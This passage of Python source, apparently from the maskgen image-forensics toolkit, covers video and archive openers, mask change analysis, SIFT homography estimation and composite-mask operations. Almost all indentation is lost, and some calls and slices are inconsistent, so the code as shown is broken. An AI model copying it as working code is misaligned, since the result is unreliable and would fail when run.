def openImage(self, filename, isMask=False, args=None):
if not ('video' in getFileMeta(filename)):
return ImageOpener.openImage(self, get_icon('audio.png'))
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readImageFromVideo(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
class ZipOpener(VideoOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
VideoOpener.__init__(self, videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
def openImage(self, filename, isMask=False, args=None):
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readFromZip(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
class CollectionOpener(ImageOpener):
def __init__(self):
ImageOpener.__init__(self)
def openImage(self, filename, isMask=False, args=None):
return ImageOpener.openImage(self, get_icon('zip.jpg'))
class TgzOpener(VideoOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
VideoOpener.__init__(self, videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
def openImage(self, filename, isMask=False, args=None):
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readFromArchive(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
def getContentsOfZip(filename):
from zipfile import ZipFile
with ZipFile(filename, 'r') as inzip:
names = inzip.namelist()
names.sort()
return names
def condenseZip(filename, outputfile=None, filetypes=None, keep=2):
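    """
    Write a condensed copy of the zip, keeping at most 'keep' real entries per file extension and
    replacing the remainder with empty placeholder entries of the same name.
    """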
from zipfile import ZipFile
import re
filetypematcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')') \
if filetypes is not None else re.compile('.*')
fn = os.path.splitext(filename)[0] + '_c' + os.path.splitext(filename)[1] if outputfile is None else outputfile
cleanup = []
try:
with ZipFile(fn, 'w') as outzip:
with ZipFile(filename, 'r') as inzip:
names = inzip.namelist()
names.sort()
extensions = {}
for i in range(len(names)):
name = names[i]
extension = os.path.splitext(name)[1]
if len(filetypematcher.findall(name)) == 0:
continue
if extension not in extensions:
extensions[extension] = 1
else:
extensions[extension] += 1
dir = os.path.dirname(os.path.abspath(filename))
extracted_file = os.path.join(dir, name)
cleanup.append(extracted_file)
if extensions[extension] <= keep:
extracted_file = inzip.extract(name, dir)
outzip.write(extracted_file, name)
else:
with open(extracted_file, 'wb') as fp:
fp.flush()
outzip.write(extracted_file, name)
finally:
for filename in cleanup:
if os.path.exists(filename):
os.remove(filename)
def openImage(filename, videoFrameTime=None, isMask=False, preserveSnapshot=False, args=None):
"""
Open and return an image from the file. If the file is a video, find the first non-uniform frame.
    If videoFrameTime, a (milliseconds, frame count) tuple, is provided, find the frame at or after that point in time.
preserveSnapshot, False by default, informs the function to save the frame image after extraction for videos
"""
import os
if not os.path.exists(filename):
logging.getLogger('maskgen').warning(filename + ' is missing.')
if not filename.endswith('icons/RedX.png'):
return openImage(get_icon('RedX.png'))
return None
prefix = os.path.splitext(filename)[1][1:].lower()
opener = ImageOpener()
if prefix in ['avi', 'mp4', 'mov', 'flv', 'qt', 'wmv', 'm4p', 'mpeg', 'mpv',
'm4v', 'mts', 'mpg'] or fileType(filename) == 'video':
opener = VideoOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif prefix in ['zip', 'gz']:
if fileType(filename) == 'collection':
opener = CollectionOpener()
else:
opener = ZipOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif prefix in [ 'tgz']:
if fileType(filename) == 'collection':
opener = CollectionOpener()
else:
opener = TgzOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif fileType(filename) == 'audio':
opener = AudioOpener()
return opener.openImage(filename, isMask=isMask, args=args)
def interpolateMask(mask, startIm, destIm, invert=False, arguments=dict()):
"""
:param mask:
    :param startIm:
    :param destIm:
:param invert:
:param arguments:
:return:
@type mask: ImageWrapper
    @type startIm: ImageWrapper
    @type destIm: ImageWrapper
"""
maskInverted = mask if invert else mask.invert()
mask = np.asarray(mask)
mask = mask.astype('uint8')
logger = logging.getLogger('maskgen')
try:
mask1 = convertToMask(startIm).to_array() if startIm.has_alpha() else None
logger.debug('SIFT')
TM, matchCount = __sift(startIm, destIm, mask1=mask1, mask2=maskInverted, arguments=arguments)
except:
TM = None
if TM is not None:
logger.debug('WARP')
newMask = cv2.warpPerspective(mask, TM, (startIm.size[0], startIm.size[1]), flags=cv2.WARP_INVERSE_MAP,
borderMode=cv2.BORDER_CONSTANT, borderValue=255)
analysis = {}
analysis['transform matrix'] = serializeMatrix(TM)
return newMask, analysis
elif getValue(arguments,'homography','None') != 'None':
logger.debug('SIFT Failed. Find Countours')
try:
contours, hier = cv2api.findContours(255 - mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
minpoint = None
maxpoint = None
for contour in contours:
for point in contour:
if type(point[0]) is np.ndarray:
point = point[0]
if minpoint is None:
minpoint = point
else:
minpoint = (min(minpoint[0], point[0]), min(minpoint[1], point[1]))
if maxpoint is None:
maxpoint = point
else:
maxpoint = (max(maxpoint[0], point[0]), max(maxpoint[1], point[1]))
w = maxpoint[0] - minpoint[0] + 1
h = maxpoint[1] - minpoint[1] + 1
x = minpoint[0]
y = minpoint[1]
if (startIm.size[0] - w) == 0 and (startIm.size[1] - h) == 0:
return mask[y:y + h, x:x + w], {}
except:
return None, None
return None, None
def serializeMatrix(m):
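    """
    Serialize a numpy matrix into a JSON-friendly dict, e.g. a 2x2 identity becomes
    {'r': 2, 'c': 2, 'r0': [1.0, 0.0], 'r1': [0.0, 1.0]}.
    """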
if m is None:
return None
data = {'r': m.shape[0],'c':m.shape[1]}
for r in range(m.shape[0]):
data['r' + str(r)] = list(m[r, :])
return data
def deserializeMatrix(data):
if data is None:
return None
m = np.zeros((int(data['r']), int(data['c'])))
for r in range(m.shape[0]):
m[r, :] = data['r' + str(r)]
return m
def redistribute_intensity(edge_map):
"""
    Produce an intensity_map that redistributes the intensity values found in the edge_map evenly over 1 to 255
:param edge_map contains a map between an edge identifier (s,e) and an intensity value from 1 to 255 and possibly a color
:return map of intensity value from edge map to a replacement intensity value
@type edge_map {(str,str): (int,[])}
"""
levels = [x[0] for x in edge_map.values()]
colors = [str(x[1]) for x in edge_map.values() if x[1] is not None]
unique_colors = sorted(np.unique(colors))
intensities = sorted(np.unique(levels))
intensity_map = [0]
if len(unique_colors) == len(intensities):
for x in edge_map.values():
intensity_map[x[0]] = x[1]
return intensity_map
increment = int(16777216 / (len(intensities) + 1))
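    # Space the replacement colors evenly across the 24-bit color range so adjacent levels remain visually distinct.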
for pos in range(len(intensities)):
v = (pos + 1) * increment
intensity_map.append([(v % 65536) / 256, v / 65536, (v % 65536) % 256])
for k, v in edge_map.iteritems():
edge_map[k] = (v[0], intensity_map[v[0]])
#im = np.zeros((500,500,3)).astype('uint8')
#pos = 0
#for i in intensity_map:
# im[pos,:] = i
# pos+=1
#ImageWrapper(im).save('foo.png')
return intensity_map
def maskToColorArray(img, color=[0, 0, 0]):
"""
Create a new image setting all white to the color and all black to white.
:param img:
:param color:
:return:
@type img: ImageWrapper
@rtype ImageWrapper
"""
imarray = np.asarray(img)
rgb = np.ones((imarray.shape[0], imarray.shape[1], 3)).astype('uint8') * 255
rgb[imarray == 0, :] = color
return rgb
def toColor(img, intensity_map={}):
"""
Produce an image that changes gray scale to color.
First, set the intensity values of each pixel using the intensity value from the intensity map
Then use a color map to build a color image
Then repopulate the edge_map with the assigned color for each edge
:param img gray scale image
:param intensity_map intensity value mapped to its replacement
:return the new color image
"""
result = cv2.applyColorMap(img.astype('uint8'), cv2.COLORMAP_HSV)
for old, new in intensity_map.iteritems():
result[img == old] = new
result[img == 0] = [255, 255, 255]
return result
def toComposite(img):
"""
Convert to a mask with white indicating change
:param img gray scale image
:return image
"""
result = np.zeros(img.shape).astype('uint8')
result[img > 0] = 255
return result
def toIntTuple(tupleString):
import re
if tupleString is not None and tupleString.find(',') > 0:
return tuple([int(re.sub('[()L]', '', x)) for x in tupleString.split(',')])
return 0, 0
def sizeOfChange(mask):
if len(mask.shape) == 2:
return mask.size - sumMask(mask == 255)
else:
mask_size = mask.shape[0] * mask.shape[1]
return mask_size - sumMask(np.all(mask == [255, 255, 255], axis=2))
def maskChangeAnalysis(mask, globalAnalysis=False):
mask = np.asarray(mask)
totalPossible = reduce(lambda a, x: a * x, mask.shape)
totalChange = sumMask(mask.astype('float32')) / 255.0
ratio = float(totalChange) / float(totalPossible)
globalchange = True
if globalAnalysis:
globalchange = ratio > 0.75
(x, y), (w, h) = boundingRegion(mask)
area = float(w*h)
region = mask[x:x+w,y:y+w]
np.diff(np.where(region > 0)[1])
xhist = np.histogram(np.where(region > 0)[0],bins=min(256,region.shape[0]))[0]
        yhist = np.histogram(np.where(region > 0)[1], bins=min(256, region.shape[1]))[0]
dispersion = xhist[0] > 0 and xhist[-1] > 0 and yhist[0] > 0 and yhist[-1] > 0
globalchange |= (area/totalPossible > 0.75) and dispersion
return globalchange, 'small' if totalChange < 2500 else ('medium' if totalChange < 10000 else 'large'), ratio
def SSIMAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
globalchange = img1.size != img2.size
img1, img2 = __alignChannels(img1, img2)
    analysis['ssim'] = compare_ssim(np.asarray(img1), np.asarray(img2), multichannel=False)
if mask is not None:
mask = np.copy(np.asarray(mask))
mask[mask > 0] = 1
analysis['local ssim'] = ssim(img1 * mask, img2 * mask, mask, R=65536)
return globalchange
def globalTransformAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
"""
Determine if operation is global. Capture 'change size ratio' and 'change size category'.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
globalchange = img1.size != img2.size
totalChange = ''
ratio = 1.0
if mask is not None:
globalchange, totalChange, ratio = maskChangeAnalysis(mask, not globalchange)
analysis['global'] = arguments['global operation'] if 'global operation' in arguments else \
('yes' if globalchange else 'no')
analysis['change size ratio'] = ratio
analysis['change size category'] = totalChange
return globalchange
def localTransformAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
"""
Non-global operations, capturing 'change size ratio' and 'change size category'.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
globalchange = globalTransformAnalysis(analysis, img1, img2,
mask=mask,
linktype=linktype,
arguments=arguments,
directory=directory)
analysis['global'] = 'no'
return globalchange
def forcedSiftWithInputAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Perform SIFT regardless of the global change status, using an input mask from the parameters
to select the source region.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments: parameters
:return:
"""
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
if 'inputmaskname' in arguments:
inputmask = openImageFile(os.path.join(directory, arguments['inputmaskname'])).to_mask().to_array()
# a bit arbitrary. If there is a less than 50% overlap, then isolate the regions highlighted by the inputmask
# otherwise just use the change mask for the transform. The change mask should be the full set of the pixels
# changed and the input mask a subset of those pixels
if sumMask(abs((mask.image_array - inputmask) / 255)) / float(sumMask(mask.image_array / 255)) >= 0.75:
# want mask2 to be the region moved to
mask2 = mask - inputmask
# mask1 to be the region moved from
mask = inputmask
else:
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
else:
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def forcedSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Perform SIFT regardless of the global change status.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:return:
"""
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def seamAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
    Perform SIFT regardless of the global change status. If a neighbor mask is constructed, indicating the seams
can be calculated, then mark as not Global.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
forcedSiftAnalysis(analysis, img1, img2, mask=mask, linktype=linktype, arguments=arguments, directory=directory)
if 'neighbor mask' in arguments:
analysis['global'] = 'no'
def rotateSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
If the image is rotated by values other than factors of 90 degrees, use SIFT to build a homography.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
import copy
rot = float(getValue(arguments,'rotation',-1))
is_local = getValue(arguments,'local',True)
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if abs(rot % 90)<0.001 and not is_local:
return
if is_local:
return siftAnalysis(analysis, img1, img2, mask=mask, linktype=linktype, arguments=arguments, directory=directory)
# global case and not a factor of 90
# skip video
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
serializedMatrix = getValue(arguments,'transform matrix')
if serializedMatrix is None:
args = copy.copy(arguments)
(x,y),(w,h) = boundingRegion(mask.invert().image_array)
if (w-x + h-y) > 0.5*(mask.size[0] + mask.size[1]):
args['Matcher.TREES'] = 6
args['Matcher.CHECKS'] = 20
matrix,matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=args)
if matrix is not None and isHomographyOk(matrix,img1.size[1],img1.size[0]):
analysis['transform matrix'] = serializeMatrix(matrix)
else:
analysis['transform matrix'] = serializedMatrix
def siftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Use SIFT to build a homography for transform type changes that manipulated prior masks for probes.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
if globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments):
return
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def boundingRegion(mask):
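    """
    Return the top-left and bottom-right corners ((x, y), (x + w, y + h)) of the mask's bounding
    region, as computed by widthandheight().
    """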
x, y, w, h = widthandheight(mask)
return (x, y), (x + w, y + h)
def boundingRectange(mask):
allpoints = []
contours, hierarchy = cv2api.findContours(np.copy(mask), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for i in range(0, len(contours)):
cnt = contours[i]
allpoints.extend(cnt)
hull = cv2.convexHull(np.asarray(allpoints))
return cv2.minAreaRect(hull)
def _affineTransformDonorImage(initialImage, donorImage, mask, donorMask):
dims = initialImage.shape[2]
IM = (255 - mask)
IDM = (255 - donorMask)
mcenter, mdims, mrotation = boundingRectange(IM)
dcenter, ddims, drotation = boundingRectange(IDM)
ratiox = float(donorImage.shape[0]) / float(initialImage.shape[0])
ratioy = float(donorImage.shape[1]) / float(initialImage.shape[1])
scale = min(float(mdims[0]) * ratiox / ddims[0], float(mdims[1]) * ratioy / ddims[1])
M = cv2.getRotationMatrix2D(mcenter, drotation - mrotation, scale)
IDM3 = np.zeros((donorImage.shape[0], donorImage.shape[1], dims))
IM3 = np.zeros((initialImage.shape[0], initialImage.shape[1], dims))
for i in range(dims):
IDM3[:, :, i] = IDM
IM3[:, :, i] = IM
donorImageSelection = donorImage[:, :, 0:dims] * IDM3
return cv2.warpAffine(donorImageSelection, M, (initialImage.shape[1], initialImage.shape[0]))
def generateOpacityImage(initialImage, donorImage, outputImg, mask, donorMask, tm):
"""
Assume opacity is o such that
outputImg = initialImage*(mask/255) + initialImage*((255-mask)/255)*(1-o) + donorImage*o*((255-donormask)/255)
IM = inverted mask
IDM = inverted donor mask
outputImg - initialImage*(mask/255) = initialImage*IM - initialImage*IM*o + donorImage*o*((255-donormask)/255)
outputImg - initialImage*(mask/255) - initialImage*IM = donorImage*IDM*o - initialImage*IM*o
outputImg - initialImage = donorImage*IDM*o - initialImage*IM*o
outputImg - initialImage = o * (donorImage*IDM - initialImage*IM)
o = (outputImg - initialImage)/(donorImage*IDM - initialImage*IM)
    Challenging since the donor mask is not lined up with the image exactly.
:param img1:
:param img2:
:param outputImg:
:param mask:
:return:
"""
dims = initialImage.shape[2]
IDM = (255 - donorMask) / 255
IM = (255 - mask) / 255
IDM3 = np.zeros((donorImage.shape[0], donorImage.shape[1], dims))
IM3 = np.zeros((initialImage.shape[0], initialImage.shape[1], dims))
for i in range(dims):
IDM3[:, :, i] = IDM
IM3[:, :, i] = IM
donorImageSelection = (donorImage[:, :, 0:dims] * IDM3)
if tm is not None:
transformedImageAligned = cv2.warpPerspective(donorImageSelection, tm,
(initialImage.shape[1], initialImage.shape[0]),
flags=cv2.INTER_LINEAR,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
else:
transformedImageAligned = _affineTransformDonorImage(initialImage, donorImage, mask, donorMask).astype('uint8')
# r = i(1-o) + t*o
# r = i - o*i + t*o
# r-i = o*t - o*i
# r-i= o(t-i)
# o = (r-i)/(t-i)
diffDonorImage = abs(transformedImageAligned * IM3 - initialImage * IM3).astype('float32')
diffOutputImage = abs(outputImg[:, :, 0:dims] * IM3 - initialImage * IM3).astype('float32')
result = np.zeros(diffOutputImage.shape)
result[diffDonorImage > 0.0] = diffOutputImage[diffDonorImage > 0] / diffDonorImage[diffDonorImage > 0.0]
result[np.isinf(result)] = 0.0
result[result > 1] = 1.0
if dims > 3:
result[:, :, 3] = 1
return result
def generateOpacityColorMask(initialImage, donorImage, outputImg, mask, donorMask):
result = generateOpacityImage(initialImage, donorImage, outputImg, mask, donorMask)
min = np.min(result)
max = np.max(result)
return (result - min) / (max - min) * 255.0
def optionalSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
    If 'location change' is not in parameters or 'location change' is 'no', skip this step.
Otherwise, use SIFT to find a homography.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
if 'location change' not in arguments or arguments['location change'] == 'no':
return
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
if matrix is not None:
analysis['transform matrix'] = serializeMatrix(matrix)
def createMask(img1, img2, invert=False, arguments={}, alternativeFunction=None, convertFunction=None):
mask, analysis, error = __composeMask(img1,
img2,
invert,
arguments=arguments,
alternativeFunction=alternativeFunction,
convertFunction=convertFunction)
analysis['shape change'] = sizeDiff(img1, img2)
if 'location' not in analysis:
analysis['location'] = '(0,0)'
analysis['empty mask'] = 'yes' if np.all(mask == 255) else 'no'
return ImageWrapper(mask), analysis, error
def __indexOf(source, dest):
positions = []
for spos in range(len(source)):
for dpos in range(len(dest)):
if (source[spos] == dest[dpos]).all():
positions.append(spos)
break
return positions
def __flannMatcher(d1, d2, args=None):
FLANN_INDEX_KDTREE = 0
TREES = 16
CHECKS = 50
if 'Matcher.CHECKS' in args:
CHECKS = int(args['Matcher.CHECKS'])
if 'Matcher.TREES' in args:
TREES = int(args['Matcher.TREES'])
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=TREES)
search_params = dict(checks=CHECKS)
flann = cv2.FlannBasedMatcher(index_params, search_params)
return flann.knnMatch(d1, d2, k=2) if d1 is not None and d2 is not None else []
def getMatchedSIFeatures(img1, img2, mask1=None, mask2=None, arguments=dict(), matcher=__flannMatcher):
img1 = img1.to_rgb(data_type=np.uint8).apply_mask(mask1).to_array()
img2 = img2.to_rgb(data_type=np.uint8).apply_mask(mask2).to_array()
threshold = arguments['sift_match_threshold'] if 'sift_match_threshold' in arguments else 10
maxmatches = int(arguments['homography max matches']) if 'homography max matches' in arguments else 10000
def getRange(size, segment_size=2048):
"""
        Divide the size into segment_size ranges.
        :param size:
        :param segment_size:
        :return: list of ranges as represented by tuples (start, end, last-range indicator)
"""
ranges = [(x * segment_size, min((x + 1) * segment_size, size), False) for x in range(size / segment_size + 1)]
if ranges[-1][1] - ranges[-1][0] < segment_size and len(ranges) > 1:
ranges = ranges[:-2] + [(ranges[-2][0],ranges[-1][1], True)]
else:
ranges[-1] = (ranges[-1][0], ranges[-1][1], True)
return ranges
def updateKP(kp,pos):
kp.pt = (kp.pt[0]+pos[0], kp.pt[1]+pos[1])
return kp
def filterKP(pt, xstart, xend, ystart, yend):
"""
Filter out points outside the 'window' surrounded by the buffer
:param pt:
:param xstart:
:param xend:
:param ystart:
:param yend:
:return:
"""
return \
(pt[0] >= xstart and pt[0] <= xend) and \
(pt[1] >= ystart and pt[1] <= yend)
def computeSIFTOverRanges(img1,buffer_size=16, segment_size=2048):
total_kp = []
total_d = None
for xrange in getRange(img1.shape[0]):
for yrange in getRange(img1.shape[1]):
(kp, ds) = cv2api.cv2api_delegate.computeSIFT(
img1[max(0,xrange[0]-buffer_size):min(xrange[1]+buffer_size,img1.shape[0]),
max(0,yrange[0]-buffer_size):min(yrange[1]+buffer_size,img1.shape[1])])
xstart = buffer_size - 1 if xrange[0] > 0 else 0
xend = segment_size*2 if xrange[2] else (segment_size + \
(0 if xrange[0] == 0 else buffer_size))
ystart = buffer_size - 1 if yrange[0] > 0 else 0
yend = segment_size*2 if yrange[2] else (segment_size + \
(0 if yrange[0] == 0 else buffer_size))
kept = [kpi for kpi in range(len(kp)) if filterKP(kp[kpi].pt,
xstart,xend,
ystart,yend)]
total_kp.extend([updateKP(kp[kpi],(xrange[0],yrange[0])) for kpi in kept])
if ds is not None:
ds = ds[kept,:]
if total_d is None:
total_d = ds
else:
total_d = np.concatenate((total_d,ds))
return total_kp,total_d
(kp2, d2) = computeSIFTOverRanges(img2)
if kp2 is None or len(kp2) == 0:
return None
(kp1, d1) = computeSIFTOverRanges(img1)
if kp1 is None or len(kp1) == 0:
return None
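    # RootSIFT-style normalization: L1-normalize each descriptor, then take the element-wise square root.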
d1 /= (d1.sum(axis=1, keepdims=True) + 1e-7)
d1 = np.sqrt(d1)
d2 /= (d2.sum(axis=1, keepdims=True) + 1e-7)
d2 = np.sqrt(d2)
matches = matcher(d1,d2, args=arguments)
# store all the good matches as per Lowe's ratio test.
good = [m for m, n in matches if m.distance < 0.75 * n.distance]
    good = sorted(good, key=lambda g: g.distance)  # best (smallest distance) matches first
good = good[0:min(maxmatches, len(good))]
if len(good) >= threshold:
src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)
return (src_pts, dst_pts) if src_pts is not None else None
return None
def _remap(img, mask, src_pts, dst_pts):
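    """
    Warp img using a dense displacement field interpolated (via griddata) from the sparse point
    correspondences, leaving pixels outside the mask at their original locations.
    """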
from scipy.interpolate import griddata
long = mask.reshape(mask.shape[0] * mask.shape[1])
grid_x, grid_y = np.mgrid[0:mask.shape[0], 0:mask.shape[1]]
grid_z = griddata(np.array(dst_pts),
np.array(src_pts), (grid_x, grid_y), method='cubic', rescale=True)
map_x = np.append([], [ar[:, 0] for ar in grid_z])
map_y = np.append([], [ar[:, 1] for ar in grid_z])
default_x = np.append([], [ar for ar in grid_x])
default_y = np.append([], [ar for ar in grid_y])
# remove remaps outside the mask
map_x[long == 0] = default_x[long == 0]
map_y[long == 0] = default_y[long == 0]
# fix nan's with no mapping
jj = np.where(np.isnan(map_x))
map_x[jj] = default_x[jj]
jj = np.where(np.isnan(map_y))
map_y[jj] = default_y[jj]
map_x_32 = map_x.astype('float32').reshape(mask.shape)
map_y_32 = map_y.astype('float32').reshape(mask.shape)
return cv2.remap(img, map_y_32, map_x_32, cv2.INTER_NEAREST)
def __grid(img1, img2, compositeMask, edgeMask=None, arguments=None):
"""
    Compute sparse point correspondences between img1 and img2 and use them to remap the composite mask.
    :param img1:
    :param img2:
    :param compositeMask:
    :param edgeMask:
    @type img1: ImageWrapper
    @type img2: ImageWrapper
    :return: the remapped composite mask, or the original compositeMask if no matches are found
"""
src_dts_pts = getMatchedSIFeatures(img1, img2, mask1=edgeMask, mask2=None, arguments=arguments)
if src_dts_pts is None:
return compositeMask
newMask = _remap(compositeMask, edgeMask,
[[x[0][1], x[0][0]] for x in src_dts_pts[0].astype('int')],
[[x[0][1], x[0][0]] for x in src_dts_pts[1].astype('int')])
# r = np.zeros(r.shape).astype('uint8')
# for x in range(len(src_dts_pts[1])):
# cv2.line(r,tuple(src_dts_pts[0][x][0]),tuple(src_dts_pts[1][x][0]),255)
# r[int(x[0][1]),int(x[0][0])] = 255
return newMask
def __sift(img1, img2, mask1=None, mask2=None, arguments=None):
"""
    Compute homography to transform img1 to img2.
    Apply the mask to each in order to only compare relevant regions of the images.
:param img1:
:param img2:
:param mask1:
:param mask2:
@type img1: ImageWrapper
@type img2: ImageWrapper
:return: None if a matrix cannot be constructed, otherwise a 3x3 transform matrix
"""
arguments = dict(arguments)
homography = arguments['homography'] if arguments is not None and 'homography' in arguments else 'RANSAC-4'
if homography in ['None', 'Map']:
return None, None
elif homography in ['All'] and 'homography max matches' in arguments:
# need as many as possible
arguments.pop('homography max matches')
src_dts_pts = getMatchedSIFeatures(img1, img2, mask1=mask1, mask2=np.asarray(mask2), arguments=arguments)
if src_dts_pts is not None:
new_src_pts = src_dts_pts[0]
new_dst_pts = src_dts_pts[1]
matches = None
if homography == 'LMEDS':
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts, cv2.LMEDS)
elif homography == 'All':
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts)
elif homography.find('-') > 0:
try:
                RANSAC_THRESHOLD = float(homography[homography.find('-') + 1:])
except:
RANSAC_THRESHOLD = 10.0
if matches is None:
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts, cv2.RANSAC, RANSAC_THRESHOLD)
matchCount = np.sum(matches)
        if float(matchCount) / len(new_src_pts) < 0.15 and matchCount < 30:
return None, None
return M1, matchCount
return None, None
def applyResizeComposite(compositeMask, shape, interpolation=2):
"""
Resize the composite mask
:param compositeMask:
    :param shape: target (height, width)
    :param interpolation: cv2 interpolation flag
    :return:
"""
newMask = np.zeros(shape).astype('uint8')
for level in list(np.unique(compositeMask)):
if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 1024
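        # scale each level up to a high-valued plane so that, after interpolation, a > 300 threshold recovers a crisp mask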
newLevelMask = cv2.resize(levelMask, (shape[1], shape[0]),interpolation=interpolation)
newMask[newLevelMask > 300] = level
return newMask
class Flipper:
def __init__(self, mask, flip):
self.mask = mask
self.flipdirection = flip
self.region = boundingRegion(mask)
def _lcs(self, alist, blist):
"""
:param alist
:param blist:
:return:
"""
m = len(alist)
n = len(blist)
counter = [[0] * (n + 1) for x in range(m + 1)]
longest = 0
lcs_set = (0, 0)
for i in range(m):
for j in range(n):
if alist[i] == blist[j]:
c = counter[i][j] + 1
counter[i + 1][j + 1] = c
if c > longest:
lcs_set = (i, j)
longest = c
return lcs_set, longest
def flip(self, compositeMask):
flipped = compositeMask[self.region[0][1]:self.region[1][1], self.region[0][0]:self.region[1][0]]
flipped = cv2.flip(flipped,
1 if self.flipdirection == 'horizontal' else (-1 if self.flipdirection == 'both' else 0))
flipCompositeMask = np.zeros(self.mask.shape).astype('uint8')
flipCompositeMask[self.region[0][1]:self.region[1][1], self.region[0][0]:self.region[1][0]] = flipped
return flipCompositeMask
def applyFlipComposite(compositeMask, mask, flip):
"""
Since SIFT cannot represent a flip, flip the selected area directly.
:param compositeMask:
:param mask:
:param flip:
:return:
"""
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
flipper = Flipper(maskInverted, flip)
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
def work(levelMask):
flipCompositeMask = flipper.flip(levelMask)
return (flipCompositeMask + levelMask * maskAltered).astype('uint8')
return applyToComposite(compositeMask,work)
def applyToComposite(compositeMask, func, shape=None):
"""
Loop through each level and apply the function.
Each level is expanded to a 255 mask before the function is applied and mapped back to its level afterwards.
:param compositeMask:
:param func:
:param shape:
:return:
"""
newMask = np.zeros(shape if shape is not None else compositeMask.shape).astype('uint8')
for level in list(np.unique(compositeMask)):
